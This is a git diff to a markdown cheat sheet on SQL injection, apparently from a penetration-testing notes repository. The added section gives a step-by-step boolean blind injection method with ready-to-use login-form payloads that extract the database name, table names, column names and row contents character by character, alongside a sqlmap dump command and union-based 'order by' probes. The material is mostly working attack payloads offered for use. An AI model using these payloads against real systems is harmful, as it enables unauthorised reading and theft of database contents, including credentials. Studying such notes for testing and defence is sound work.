diff --git a/Exploits/Databases/SQL Injection.md b/Exploits/Databases/SQL Injection.md
index f0c734d..057bb93 100644
--- a/Exploits/Databases/SQL Injection.md	
+++ b/Exploits/Databases/SQL Injection.md	
@@ -57,22 +57,66 @@ SELECT * FROM users WHERE username = admin AND password :=1' or 1 > 2 --+
 
 ### Blind injection
 
-* A blind injection methods tries to guess characters not by returned values but by how the DB behaves to your request
+A blind injection methods tries to guess characters not by returned values
+but by how the DB behaves to your request
+
 ```sh
 http://example.com/?id=1' and substr((select database()),1,1) < 105 --+
 ```
+
 ```sh
 http://example.com/?id=1' and (ascii(substr((select database(),1,1)) = 115 --+
 ```
+
 * Function substr(string, start, length)
-* sqlmap via `--level=5 --risk=3 --dbms=sqlite --technique=b --dump` 
+* sqlmap via `--level=5 --risk=3 --dbms=sqlite --technique=b --dump`
+
+__How do you go forward when you know, that there is a possible boolean blind injection?__
+
+You want to get
+
+* Database name
+* Table name
+* Column name
+
+and watch out for return values, status codes, if you are logged in a session
+inside the browser, etc., ... .
+
+Start at the databasename character on position 1, after that 2 and so on via a
+POST request
+
+```sql
+username=admin'+and+substring(database(),1,1)="a"+#&password='
+username=admin'+and+substring(database(),2,1)="b"+#&password='
+```
+
+Next, find the characters of the tablename via
+
+```sql
+username=admin'+and+substring((select+table_name+from+information_schema.tables+where+table_schema="<found_databasename>"+limit+0,1),1,1)+=+"a"+#&password='
+username=admin'+and+substring((select+table_name+from+information_schema.tables+where+table_schema="<found_databasename>"+limit+0,1),2,1)+=+"b"+#&password='
+```
+
+Find the column_name of the table
+
+```sql
+username=admin'+and+substring((select+column_name+from+information_schema.columns+where+table_name="<found_tablename>"+limit+0,1),1,1)+=+"a"+#&password='
+username=admin'+and+substring((select+column_name+from+information_schema.columns+where+table_name="<found_tablename>"+limit+0,1),2,1)+=+"b"+#&password='
+```
+
+Query content of the table and columns found via
+
+```sql
+username=admin'+and+substring((select+<found_columnname>+from+<found_tablename>+limit+0,1),1,1)="a"+#&password='
+```
 
 ### Union based
 
-Union based injections is an incremental and cautios approach.  
-Start by trying to provoke errors to validate a possible injection.  
+Union based injections is an incremental and cautios approach.
+Start by trying to provoke errors to validate a possible injection.
 
 * __First method__ check by order until error occurs
+
 ```sql
 ' order by 1 -- -
 ' order by 2 -- -